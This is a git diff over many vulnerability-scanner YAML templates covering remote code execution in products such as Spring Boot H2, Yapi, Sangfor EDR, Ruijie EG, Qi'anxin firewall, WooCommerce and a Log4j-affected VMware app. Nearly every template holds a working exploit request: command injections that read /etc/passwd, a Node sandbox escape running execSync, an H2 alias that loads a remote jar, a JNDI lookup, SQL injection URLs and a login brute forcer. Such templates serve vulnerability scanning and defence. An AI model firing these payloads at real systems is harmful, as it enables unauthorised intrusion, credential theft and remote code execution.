a/poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml +++ b/poc/remote_code_execution/pdf-signer-ssti-to-rce-9470.yaml @@ -3,14 +3,13 @@ info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - tags: ssti,rce,csrf + tags: ssti,rce requests: - method: GET path: - "{{BaseURL}}" headers: Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" - skip-variables-check: true matchers-condition: and matchers: - type: status @@ -18,5 +17,5 @@ requests: - 200 - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body diff --git a/poc/remote_code_execution/phalcon-framework-source-9495.yaml b/poc/remote_code_execution/phalcon-framework-source-9495.yaml index 0e2270201c..6defaf1e55 100644 --- a/poc/remote_code_execution/phalcon-framework-source-9495.yaml +++ b/poc/remote_code_execution/phalcon-framework-source-9495.yaml @@ -1,14 +1,16 @@ id: phalcon-framework-source + info: - name: Phalcon Framework - Source Code Leakage + name: Phalcon Framework Source Code leakage author: philippedelteil severity: high - description: Phalcon Framework source code was discovered. tags: exposure,debug,phalcon + requests: - method: GET path: - "{{BaseURL}}/anything_here" + matchers-condition: and matchers: - type: word @@ -17,8 +19,7 @@ requests: - "Phalcon Framework" - "AnythingHereController" condition: and + - type: status status: - - 200 - -# Enhanced by mp on 2022/07/15 + - 200 \ No newline at end of file diff --git a/poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml b/poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml index c026dfba3c..ffc06f17f1 100644 --- a/poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml +++ b/poc/remote_code_execution/php-zerodium-backdoor-rce-9572.yaml @@ -1,18 +1,10 @@ id: php-zerodium-backdoor-rce info: - name: PHP 8.1.0-dev - Backdoor Remote Code Execution + name: PHP Zerodium Backdoor RCE author: dhiyaneshDk - severity: critical - description: | - PHP 8.1.0-dev contains a backdoor dubbed 'zerodiumvar_dump' which can allow the execution of arbitrary PHP code. - reference: - - https://news-web.php.net/php.internals/113838 - - https://flast101.github.io/php-8.1.0-dev-backdoor-rce/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: php,backdoor,rce,zerodium + reference: https://news-web.php.net/php.internals/113838 + severity: high + tags: php,backdoor requests: - method: GET path: @@ -22,8 +14,6 @@ requests: matchers-condition: and matchers: - type: word - part: body words: - "int(54289)" - -# Enhanced by mp on 2022/05/30 + part: body diff --git a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml index 9ddbab9b4c..57a001da68 100644 --- a/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml +++ b/poc/remote_code_execution/qi-anxin-netkang-next-generation-firewall-rce-9757.yaml @@ -1,35 +1,29 @@ id: qi-anxin-netkang-next-generation-firewall-rce info: - name: Qi'anxin Netkang Next Generation Firewall - Remote Code Execution + name: Qi'anxin Netkang Next Generation Firewall RCE author: pikpikcu severity: critical - description: | - Qi'anxin Netkang Next Generation Firewall is susceptible to remote code execution. - reference: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: rce,firewall,intrusive + reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g + tags: rce requests: - raw: - | POST /directdata/direct/router HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 + Content-Length: 178 - {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;touch /var/www/html/{{randstr}}.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} + {"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="} - | - GET /{{randstr}}.txt HTTP/1.1 + GET /poc.txt HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 matchers-condition: and matchers: - type: regex - part: body regex: - - "root:.*:0:0:" + - "root:[x*]:0:0" + part: body - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/rconfig-rce-9836.yaml b/poc/remote_code_execution/rconfig-rce-9836.yaml index 403b9122b3..23f0e4bdf2 100644 --- a/poc/remote_code_execution/rconfig-rce-9836.yaml +++ b/poc/remote_code_execution/rconfig-rce-9836.yaml @@ -3,24 +3,28 @@ info: name: rConfig 3.9.5 - Remote Code Execution author: dwisiswant0 severity: high - description: A vulnerability in rConfig allows remote attackers to execute arbitrary code on the remote installation by accessing the 'userprocess.php' endpoint. - reference: - - https://www.rconfig.com/downloads/rconfig-3.9.5.zip - - https://www.exploit-db.com/exploits/48878 tags: rconfig,rce + # This template supports the user creation part only. + # To triggering an RCE, see references[2]. + # References: + # - [1] https://www.rconfig.com/downloads/rconfig-3.9.5.zip + # - [2] https://www.exploit-db.com/exploits/48878 requests: - raw: - | POST /lib/crud/userprocess.php HTTP/1.1 Host: {{Hostname}} Accept: */* + User-Agent: python-requests/2.23.0 + Connection: close Content-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb - Cookie: PHPSESSID={{randstr}} + Upgrade-Insecure-Requests: 1 + Cookie: PHPSESSID=pdnuclei --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="username" - {{randstr}} + pdnuclei --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="passconf" @@ -32,7 +36,7 @@ requests: --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="email" - test@{{randstr}}.tld + nuclei@projectdiscovery.io --01b28e152ee044338224bf647275f8eb Content-Disposition: form-data; name="editid" @@ -50,7 +54,7 @@ requests: matchers: - type: word words: - - "User {{randstr}} successfully added to Database" + - "User pdnuclei successfully added to Database" part: body - type: status status: diff --git a/poc/remote_code_execution/ruijie-eg-rce-9925.yaml b/poc/remote_code_execution/ruijie-eg-rce-9925.yaml index dc3c6490e2..236a2e9889 100644 --- a/poc/remote_code_execution/ruijie-eg-rce-9925.yaml +++ b/poc/remote_code_execution/ruijie-eg-rce-9925.yaml @@ -1,13 +1,16 @@ id: ruijie-eg-rce + info: name: Ruijie EG cli.php RCE author: pikpikcu severity: critical - description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen. + description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' + privileges due to a vulnerability in the login screen. reference: - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md - https://www.ruijienetworks.com tags: ruijie,rce + requests: - raw: - | @@ -16,18 +19,21 @@ requests: Content-Type: application/x-www-form-urlencoded username=admin&password=admin?show+webmaster+user + - | POST /login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin&password={{admin}} + - | POST /cli.php?a=shell HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded;charset=UTF-8 notdelay=true&command=cat /etc/passwd + cookie-reuse: true matchers-condition: and matchers: @@ -36,9 +42,11 @@ requests: - "root:.*:0:0:" - "nobody:.*:0:0" part: body + - type: status status: - 200 + extractors: - type: regex name: admin diff --git a/poc/remote_code_execution/samsung-wlan-ap-rce-10008.yaml b/poc/remote_code_execution/samsung-wlan-ap-rce-10008.yaml index 801ec50137..3d2ab419f2 100644 --- a/poc/remote_code_execution/samsung-wlan-ap-rce-10008.yaml +++ b/poc/remote_code_execution/samsung-wlan-ap-rce-10008.yaml @@ -4,7 +4,8 @@ info: name: Samsung Wlan AP (WEA453e) RCE author: pikpikcu severity: critical - reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ + reference: + - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,rce requests: @@ -17,7 +18,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - "bin:.*:1:1" part: body diff --git a/poc/remote_code_execution/sangfor-ba-rce(1).yaml b/poc/remote_code_execution/sangfor-ba-rce(1).yaml index cbad8e7894..de3c829d18 100644 --- a/poc/remote_code_execution/sangfor-ba-rce(1).yaml +++ b/poc/remote_code_execution/sangfor-ba-rce(1).yaml @@ -4,13 +4,9 @@ info: author: ritikchaddha severity: critical description: | - Sangfor products allow remote unauthenticated users to cause the product to execute arbitrary commands. + A vulnerability in Sangfor product allows remote unauthenticated users to cause the product to execute arbitrary commands. reference: - https://mobile.twitter.com/sec715/status/1406886851072253953 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 metadata: verified: true fofa-query: app="sangfor" @@ -28,5 +24,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/sangfor-edr-rce-10028.yaml b/poc/remote_code_execution/sangfor-edr-rce-10028.yaml index 1952c84b15..4cfd9320b2 100644 --- a/poc/remote_code_execution/sangfor-edr-rce-10028.yaml +++ b/poc/remote_code_execution/sangfor-edr-rce-10028.yaml @@ -1,18 +1,13 @@ id: sangfor-edr-rce + info: - name: Sangfor EDR 3.2.17R1/3.2.21 - Remote Code Execution + name: Sangfor EDR 3.2.17R1/3.2.21 RCE author: pikpikcu severity: critical - description: Sangfor EDR 3.2.17R1/3.2.21 allows remote unauthenticated users to to execute arbitrary commands. - reference: - - https://www.cnblogs.com/0day-li/p/13650452.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - metadata: - fofa-query: app="sangfor" + description: A vulnerability in Sangfor EDR product allows remote unauthenticated users to cause the product to execute arbitrary commands. + reference: https://www.cnblogs.com/0day-li/p/13650452.html tags: rce,sangfor + requests: - method: POST path: @@ -21,14 +16,13 @@ requests: Content-Type: application/x-www-form-urlencoded body: | {"params":"w=123\"'1234123'\"|cat /etc/passwd"} + matchers-condition: and matchers: - type: regex - part: body regex: - "root:.*:0:0:" + part: body - type: status status: - 200 - -# Enhanced by mp on 2022/05/31 diff --git a/poc/remote_code_execution/sar2html-rce-10080.yaml b/poc/remote_code_execution/sar2html-rce-10080.yaml index c32fd046bb..864fca1dcc 100644 --- a/poc/remote_code_execution/sar2html-rce-10080.yaml +++ b/poc/remote_code_execution/sar2html-rce-10080.yaml @@ -1,10 +1,16 @@ id: sar2html-rce info: - name: sar2html 3.2.1 - 'plot' Remote Code Execution + name: sar2html 3.2.1 - Remote Command Injection author: gy741 severity: critical - description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. - reference: https://www.exploit-db.com/exploits/49344 + description: | + SAR2HTML could allow a remote attacker to execute arbitrary commands on the system via a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system. + reference: + - https://www.exploit-db.com/exploits/49344 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 tags: sar2html,rce,oast requests: - raw: @@ -17,3 +23,5 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + +# Enhanced by mp on 2022/05/30 diff --git a/poc/remote_code_execution/seacms-rce-10102.yaml b/poc/remote_code_execution/seacms-rce-10102.yaml index 54d215da6b..6a97e997d0 100644 --- a/poc/remote_code_execution/seacms-rce-10102.yaml +++ b/poc/remote_code_execution/seacms-rce-10102.yaml @@ -1,5 +1,4 @@ id: seacms-rce - info: name: SeaCMS V6.4.5 RCE author: pikpikcu @@ -8,13 +7,11 @@ info: reference: - https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce - requests: - method: POST path: - '{{BaseURL}}/search.php?searchtype=5' body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}" - matchers-condition: and matchers: - type: word diff --git a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml index b43708d1a6..574d070ebd 100644 --- a/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml +++ b/poc/remote_code_execution/showdoc-file-upload-rce-10226.yaml @@ -1,17 +1,12 @@ id: showdoc-file-upload-rce + info: - name: Showdoc <2.8.6 - Remote Code Execution + name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - description: | - Showdoc versions before 2.8.6 is susceptible to remote code execution. - reference: - - https://github.com/star7th/showdoc/pull/1059 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: rce,fileupload,showdoc,oss,intrusive + reference: https://github.com/star7th/showdoc/pull/1059 + tags: rce,fileupload,showdoc + requests: - raw: - | @@ -25,20 +20,20 @@ requests: ----------------------------835846770881083140190633-- + matchers-condition: and matchers: - type: word - part: body words: - '"url":"http:' - '"success":1' condition: and + - type: status status: - 200 + extractors: - type: json json: - - '.url' - -# Enhanced by mp on 2022/05/30 + - '.url' \ No newline at end of file diff --git a/poc/remote_code_execution/springboot-h2-db-rce-10458.yaml b/poc/remote_code_execution/springboot-h2-db-rce-10458.yaml index 55cc32c9ad..b3eb638c72 100644 --- a/poc/remote_code_execution/springboot-h2-db-rce-10458.yaml +++ b/poc/remote_code_execution/springboot-h2-db-rce-10458.yaml @@ -3,31 +3,35 @@ info: name: Spring Boot H2 Database RCE author: dwisiswant0 severity: critical - reference: + tags: springboot,rce + # Payload taken from @pyn3rd (Twitter), see reference[2]. + reference: | - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - https://github.com/spaceraccoon/spring-boot-actuator-h2-rce - metadata: - shodan-query: http.favicon.hash:116323821 - tags: springboot,rce,jolokia requests: - - raw: - - | - POST /actuator/env HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - { - "name":"spring.datasource.hikari.connection-test-query", - "value":"CREATE ALIAS EXEC AS CONCAT('String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new',' java.util.Scanner(Runtime.getRun','time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }');CALL EXEC('whoami');" - } + - method: POST + path: + - "{{BaseURL}}/actuator/env" + headers: + Content-Type: "application/json" + body: | + { + "name": "spring.datasource.hikari.connection-init-sql", + "value":"CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName(\"pop\", true, new URLClassLoader(new URL[]{new URL(\"http://127.0.0.1:9001/pop.jar\")})).newInstance();return null;}$$; CALL remoteUrl()" + } matchers-condition: and matchers: - type: status status: - 200 - type: word + words: + - "\"spring.datasource.hikari.connection-init-sql\":\"" + condition: and part: body + - type: word words: - - '"spring.datasource.hikari.connection-test-query":"CREATE ALIAS EXEC AS CONCAT' + - "application/vnd.spring-boot.actuator" + part: header diff --git a/poc/remote_code_execution/vrealize-operations-log4j-rce-11070.yaml b/poc/remote_code_execution/vrealize-operations-log4j-rce-11070.yaml index 8baa8c7f40..e181522d35 100644 --- a/poc/remote_code_execution/vrealize-operations-log4j-rce-11070.yaml +++ b/poc/remote_code_execution/vrealize-operations-log4j-rce-11070.yaml @@ -1,19 +1,25 @@ id: vrealize-operations-log4j-rce + info: - name: VMware vRealize Operations Tenant App Log4j JNDI RCE + name: VMware vRealize Operations Tenant App Log4j JNDI Remote Code Execution author: bughuntersurya severity: critical - description: VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application. + description: | + VMware vRealize Operations is susceptible to a critical vulnerability in Apache Log4j which may allow remote code execution in an impacted vRealize Operations Tenant application. reference: - https://www.vmware.com/security/advisories/VMSA-2021-0028.html - https://core.vmware.com/vmsa-2021-0028-questions-answers-faq - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - https://nvd.nist.gov/vuln/detail/CVE-2021-45046 - metadata: - shodan-query: http.title:"vRealize Operations Tenant App" - tags: rce,log4j,vmware,vrealize + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + metadata: + verified: true + shodan-query: http.title:"vRealize Operations Tenant App" + tags: cve,cve2021,oast,rce,log4j,vmware,vrealize + requests: - raw: - | @@ -24,21 +30,24 @@ requests: Referer: {{RootURL}}/ui/ {"username":"${jndi:ldap://${hostName}.{{interactsh-url}}}","password":"admin"} + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" # Confirms the DNS Interaction + - "dns" # Confirms the DNS Interaction + - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output -# Enhanced by mp on 2022/03/21 +# Enhanced by mp on 2022/04/05 diff --git a/poc/remote_code_execution/webui-rce-11172.yaml b/poc/remote_code_execution/webui-rce-11172.yaml index 82d1fab54a..57b71c0d34 100644 --- a/poc/remote_code_execution/webui-rce-11172.yaml +++ b/poc/remote_code_execution/webui-rce-11172.yaml @@ -1,12 +1,14 @@ id: webui-rce + info: name: WebUI 1.5b6 RCE author: pikpikcu severity: critical - reference: https://www.exploit-db.com/exploits/36821 + description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter. + reference: + - https://www.exploit-db.com/exploits/36821 tags: webui,rce - requests: - method: GET path: diff --git a/poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml b/poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml index 8a96cfe510..81d422c278 100644 --- a/poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml +++ b/poc/remote_code_execution/wordpress-woocommerce-sqli-11344.yaml @@ -1,43 +1,28 @@ id: wordpress-woocommerce-sqli - info: - name: Woocommerce Unauthenticated SQL Injection + name: Unauthenticated SQL injection Woocommerce author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot severity: critical - description: The Woocommerce plugin for Wordpress contains an unauthenticated SQL injection vulnerability. - reference: + tags: wordpress,woocomernce,sqli,wp-plugin + reference: | - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021 - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx - - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-89 - tags: wordpress,woocommerce,sqli,wp-plugin,injection - requests: - method: GET path: - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' - matchers-condition: and matchers: - type: word words: - 'sqli-test' - 'attribute_counts' - - 'price_range' - - 'term' condition: and - - type: word words: - 'application/json' part: header - - type: status status: - 200 - -# Enhanced by mp on 2022/03/21 diff --git a/poc/remote_code_execution/wp-xmlrpc-brute-force-11624.yaml b/poc/remote_code_execution/wp-xmlrpc-brute-force-11624.yaml index 26b60896bf..ee80efb91c 100644 --- a/poc/remote_code_execution/wp-xmlrpc-brute-force-11624.yaml +++ b/poc/remote_code_execution/wp-xmlrpc-brute-force-11624.yaml @@ -1,13 +1,15 @@ id: wordpress-xmlrpc-brute-force + info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high - description: This template bruteforces username and passwords through xmlrpc.php being available. + description: Ths template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz + requests: - raw: - | @@ -27,15 +29,18 @@ requests: + attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt + matchers-condition: and matchers: - type: status status: - 200 + - type: word part: body words: diff --git a/poc/remote_code_execution/yapi-rce-11724.yaml b/poc/remote_code_execution/yapi-rce-11724.yaml index 62f4be0f79..0078f2b883 100644 --- a/poc/remote_code_execution/yapi-rce-11724.yaml +++ b/poc/remote_code_execution/yapi-rce-11724.yaml @@ -1,68 +1,60 @@ id: yapi-rce + info: name: Yapi Remote Code Execution author: pikpikcu severity: critical - tags: yapi,rce - reference: | + description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi + tags: yapi,rce + requests: - raw: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 94 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* - Accept-Encoding: gzip + - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 106 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip + - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 89 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 382 Content-Type: application/json;charset=UTF-8 - Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip + cookie-reuse: true extractors: - type: regex @@ -72,6 +64,7 @@ requests: part: body regex: - '"_id":([0-9]+),"group_name"' + - type: regex name: interface_id group: 1 @@ -79,6 +72,7 @@ requests: part: body regex: - '"req_body_form":\[\],"_id":([0-9]+)' + - type: regex name: project_id group: 1 @@ -86,12 +80,14 @@ requests: part: body regex: - '"tag":\[\],"_id":([0-9]+)' + matchers-condition: and matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" part: body + - type: status status: - 200 diff --git a/poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml b/poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml index c609bf218d..03e359a5d1 100644 --- a/poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml +++ b/poc/remote_code_execution/yarn-resourcemanager-rce-11734.yaml @@ -1,14 +1,19 @@ id: yarn-resourcemanager-rce + info: name: Apache Yarn ResourceManager RCE author: pdteam severity: low + description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. + reference: + - https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 tags: apache,rce - reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 + requests: - method: POST path: - '{{BaseURL}}/ws/v1/cluster/apps/new-application' + matchers-condition: and matchers: - type: word diff --git a/poc/remote_code_execution/yonyou-nc-cloud-rce.yaml b/poc/remote_code_execution/yonyou-nc-cloud-rce.yaml index 653783158e..cef49f23fa 100644 --- a/poc/remote_code_execution/yonyou-nc-cloud-rce.yaml +++ b/poc/remote_code_execution/yonyou-nc-cloud-rce.yaml @@ -1,43 +1,36 @@ id: yonyou-nc-cloud-jsinvoke-rce info: - name: Yonyou NC Cloud - Remote Code Execution - author: Co5mos + name: yonyou-nc-cloud-jsinvoke-rce + author: pphua severity: critical - description: An arbitrary file upload vulnerability in the Yonyou NC-Cloud system. Attackers can upload any files to the server and upload web shells, thereby gaining command execution privileges on the server. - reference: - - https://mp.weixin.qq.com/s/qL5LurGfuShf1emJuay2_Q + tags: yonyou,nc-cloud,rce + reference: + - https://mp.weixin.qq.com/s/-2fNt7rBj6j2inEmqIaoUA metadata: max-request: 2 verified: true fofa-query: app="用友-NC-Cloud" - tags: yonyou,rce - -variables: - str1: "{{rand_base(5)}}.txt" http: - raw: - - | + - | POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Content-Type: application/x-www-form-urlencoded + Accept-Encoding: gzip - {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["{{md5('yonyou-nc-cloud-jsinvoke-rce')}}","webapps/nc_web/{{str1}}"]} - + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["StringObject","webapps/nc_web/{{randstr}}.txt"]} + - | - GET /{{str1}} HTTP/1.1 - Host: {{Hostname}} + GET /{{randstr}}.txt HTTP/1.1 + Content-Length: 138 + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - matchers-condition: and matchers: - type: word - part: body words: - - '5d8be7535d6383e99315739724e10fa7' - - - type: status - status: - - 200 \ No newline at end of file + - "StringObject" + part: body \ No newline at end of file diff --git a/poc/ruby/rails-debug-mode-9807.yaml b/poc/ruby/rails-debug-mode-9807.yaml index fe31371bfd..bde8cd12bd 100644 --- a/poc/ruby/rails-debug-mode-9807.yaml +++ b/poc/ruby/rails-debug-mode-9807.yaml @@ -1,17 +1,20 @@ id: rails-debug-mode + info: - name: Rails Debug Mode Enabled + name: Rails Debug Mode author: pdteam severity: medium - tags: logs,rails,exposure + tags: debug,rails,exposure + requests: - method: GET path: - - 